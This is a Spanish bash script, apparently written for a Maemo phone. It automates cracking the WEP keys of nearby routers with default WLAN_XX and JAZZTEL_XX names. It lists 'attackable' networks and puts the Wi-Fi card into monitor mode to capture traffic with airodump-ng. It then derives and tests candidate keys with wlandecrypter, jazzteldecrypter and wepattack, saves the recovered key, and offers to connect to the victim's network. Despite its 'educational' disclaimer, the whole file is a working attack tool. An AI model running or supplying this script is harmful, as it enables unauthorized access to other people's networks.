#!/bin/bash
#
# Nombre: automatikwlan
# Version: 0.6.2 
# Descripción:
# Automatiza la obtención de claves wep de routers con essid
# wlan_xx y jazztel_xx
# Creado únicamente con fines educativos.
# Distribuido gratuitamente y sin ningún tipo de garantía.
# Autor: Drexxx
#

############################################################
cont=0
dirdatos="/home/user/MyDocs/automatikwlan/"
snderror="/usr/share/sounds/automatikwlan_error.wav"
sndexito="/usr/share/sounds/automatikwlan_exito.wav"
############################################################

# Detecta la interrupción por ctrl+c y ejecuta la función captura_ctrl_c
trap captura_ctrl_c INT

#Notificaciones
notificacion()
{
	run-standalone.sh dbus-send --system --type=method_call --dest=org.freedesktop.Notifications \
		/org/freedesktop/Notifications org.freedesktop.Notifications.SystemNoteInfoprint\
		string:"$1"
}

notificacion_user()
{	
	run-standalone.sh dbus-send --system --type=method_call --dest=org.freedesktop.Notifications \
	/org/freedesktop/Notifications org.freedesktop.Notifications.SystemNoteDialog\
	string:"$1" uint32:0 string:"OK"
}

############################################################
# Notificaciones de audio: éxito y error
snderror()
{
	play-sound $snderror
}

sndexito()
{
	play-sound $sndexito
}
############################################################


# Funcion setwlan0, pone la interfaz en el modo adecuado
setwlan0()
{
	ifconfig wlan0 down
	iwconfig wlan0 mode $1
	notificacion "wlan0 está ahora en modo $1"
}

# Funcion captura_ctrl_c
captura_ctrl_c()
{
	snderror
	notificacion_user "Ctrl-c, interrumpido por el usuario. Se restablecerá wlan0 a modo managed."
	setwlan0 "managed"
	exit
}

# ¿Está zenity instalado?
if [ ! "$(dpkg -l |grep zenity)" ]
then
	snderror
	notificacion "Error. Zenity no instalado."
	exit
fi
	
# Se crea el directorio donde se guardarán los datos
mkdir -p $dirdatos

############################################################
# Se comprueba si están instalados wlandecrypter, wepattack
# y jazzteldecrypter

if [ ! -f /usr/sbin/wlandecrypter ]
then
	snderror
	zenity --error --text "No se encontró wlandecrypter."
	exit
fi

if [ ! -f /usr/bin/wepattack ]
then
	snderror
	zenity --error --text "No se encontró wepattack."
	exit
fi

if [ ! -f /usr/bin/jazzteldecrypter ]
then
	snderror
	zenity --error --text "No se encontró jazzteldecrypter."
	exit
fi

############################################################

# Se prepara la tarjeta para escanear redes
setwlan0 "managed"
ifconfig wlan0 up

############################################################
# De la salida de iwlist se obtendrán los datos necesarios
# para empezar la captura. Se usa awk.
# dato tendrá la forma essid bssid canal, por lo que luego
# habrá que tratar esa salida para separar cada campo.
for dato in $(iwlist wlan0 scan | awk 'BEGIN {
		FS="[:=]"             			#Separador
	}
	/ESSID/ {             			#Busca la cadena que contiene "ESSID"
		gsub(/\"/,"")        		#De la cadena encontrada, elimina las comillas
		essid[ne++]=$2       		#Almacena el essid. Puede haber más de uno...
	}
	/Address/ {            			#Busca la cadena "Address"
		gsub(/.*Address: /,"")    	#y una vez encontrada, elimina la "porquería". Solo interesa la mac
		bssid[na++]=$0        		#Almacena
	}
	/Channel:/ {        				#Busca el canal
		canal[nc++]=$2
	}
	/Quality=/ {
		gsub(/.*Quality=/,"")
		gsub(/Signal level*/,"")
		calidad[q++]=$1
	}
END {
	for (e in essid) {    			#Recorre el array essid
		if ( essid[e] ~ /WLAN_[0-F][0-F]$/ || essid[e] ~ /JAZZTEL_[0-F][0-F]$/ ) { #Si essid es de la forma WLAN_XX o JAZZTEL_XX
			print essid[e]"%"bssid[e]"%"canal[e]"%"calidad[e]		#se envía a $dato
		}
	}        
}' )
do
	red[$cont]=$dato
	cont=`expr $cont + 1`
done

#Si no se encontraron redes, se notifica y sale.
if [ $cont -eq 0 ]
then
	zenity --error --text "No se encontraron redes atacables."
	ifconfig wlan0 down
	exit
fi

#Separamos essid, bssid y canal
cont=`expr $cont - 1`
for i in `seq 0 $cont`
do
	essid[$i]=$(echo ${red[$i]} |cut -d "%" -f 1)
	bssid[$i]=$(echo ${red[$i]} |cut -d "%" -f 2)
	canal[$i]=$(echo ${red[$i]} |cut -d "%" -f 3)
	calidad[$i]=$(echo ${red[$i]} |cut -d "%" -f 4) 
done

#Se muestra la lista de redes compatibles
listaredes=$(for i in `seq 0 $cont`
	do
		echo $i
		echo ${essid[$i]}
		echo "Bssid: "${bssid[$i]}
		echo "Canal: "${canal[$i]}
		echo "Calidad: "${calidad[$i]}
	done | zenity  --list  --text "Redes atacables disponibles" \
	--radiolist  --column "S" --column "E" --column "B" --column "C" --column "Q"
	 ) 

#Si no se selecciona ninguna red, se sale.
if [ -z "$listaredes" ]
then
	zenity --info --text "No se seleccionó ninguna red."
	ifconfig wlan0 down
	exit
fi

# Se asigna un número a la red seleccionada de la lista
indice=0
for i in `seq 0 $cont`
do
	if [ $listaredes = ${essid[$i]} ]
	then
		indice=$i
		break
	fi
done

# Se borra cualquier captura anterior de ese mismo essid
if [ -f $dirdatos${essid[$indice]}-01.cap ]; then
	rm $dirdatos${essid[$indice]}-01.*
fi

# Hora de capturar paquetes. Modo monitor, e interfaz levantada
setwlan0 "monitor"

#echo "Esperando por archivo de capturas..."
airodump-ng --channel ${canal[$indice]} --bssid ${bssid[$indice]} -w $dirdatos${essid[$indice]} wlan0 &
until [ -f $dirdatos${essid[$indice]}-01.cap ]
do
	sleep 1
done

sync

notificacion "Esperando tamaño suficiente..."
#echo "Esperando tamaño suficiente..."
# Mientras no exista el archivo ivs, o bien mientras no se obtengan al menos 4 ivs... 
while [ ! -f $dirdatos${essid[$indice]}-01.ivs ] || [ $(expr "$(echo $(ivstools --convert $dirdatos${essid[$indice]}-01.cap ${essid[$indice]}-01.ivs | awk '/Written/ {
	f=$2
}
END {
	if (!f) { print 0 }
	else { print f }
}
'))") -lt 4 ]
do	
	ivstools --convert $dirdatos${essid[$indice]}-01.cap $dirdatos${essid[$indice]}-01.ivs
	sync
	sleep 2
done

notificacion "Cerrando airodump-ng..."
#echo "Cerrando airodump-ng..."
killall -9 airodump-ng 2>/dev/null

#Llegados a este punto, ya no es necesario seguir monitorizando.
#Modo managed
#start wlancond <-- esto no lo tengo claro...
setwlan0 "managed"

notificacion "Intentando obtener la clave wep..."
#echo "Intentando obtener la clave wep..."

tipojazztel()
{
local clavejazztel=$(jazzteldecrypter ${bssid[$indice]} ${essid[$indice]} | wepattack -f $dirdatos${essid[$indice]}-01.cap | awk 'BEGIN {
	FS=" " 
}
/WepKey/ {
	gsub(/.*WepKey: /,"")
	clavewep=$0
}
END {
	print clavewep
}
')
echo $clavejazztel
}

tipowlan()
{
local clavewlan=$(wlandecrypter ${bssid[$indice]} ${essid[$indice]} | wepattack -f $dirdatos${essid[$indice]}-01.cap | awk 'BEGIN {
	FS=" " 
}
/WepKey/ {
	gsub(/.*WepKey: /,"")
	clavewep=$0
}
END {
	print clavewep
}
')
echo $clavewlan
}

if [ $(echo $essid |grep WLAN) ]
then key=$(tipowlan)
else 
    if [ $(echo $essid |grep JAZZTEL) ]
    then key=$(tipojazztel)
    fi
fi
	
borra_y_sale()
{
	#Se borra cualquier captura anterior de ese mismo essid
	if [ -f $dirdatos${essid[$indice]}-01.cap ]; then
		rm $dirdatos${essid[$indice]}-01.*
		notificacion "Archivos de captura eliminados"
	fi
	exit
}

# Si $key está vacía es que el proceso falló.
if [ "$key" = "" ]; then
	snderror
	zenity --error --text "Hubo algún tipo de error al intentar obtener la clave :( \
		Tal vez quieras revisar los logs guardados."
	borra_y_sale
fi

hexkey=$(echo $key | cut -d "(" -f1 | awk '{ gsub(" ",""); print }' ) 
asciikey=$(echo $key | cut -d "(" -f2 | cut -d ")" -f1)

echo "Clave en ascii: " $asciikey > $dirdatos${essid[$indice]}-clave.txt
echo "Clave en hexadecimal: " $hexkey >> $dirdatos${essid[$indice]}-clave.txt
sndexito
zenity --question --text "Clave conseguida con éxito: \nAscii: $asciikey\n Hexadecimal: $hexkey\n Guardada en ${essid[$indice]}-clave.txt.\n ¿Quieres conectarte ahora a esta red?"; conectar=$?
if [ "${conectar}" == "0" ]
then
	notificacion "Intentando conectar con ${essid[$indice]}"
	iwconfig wlan0 essid ${essid[$indice]} key s:$asciikey
	udhcpc -i wlan0
fi

borra_y_sale
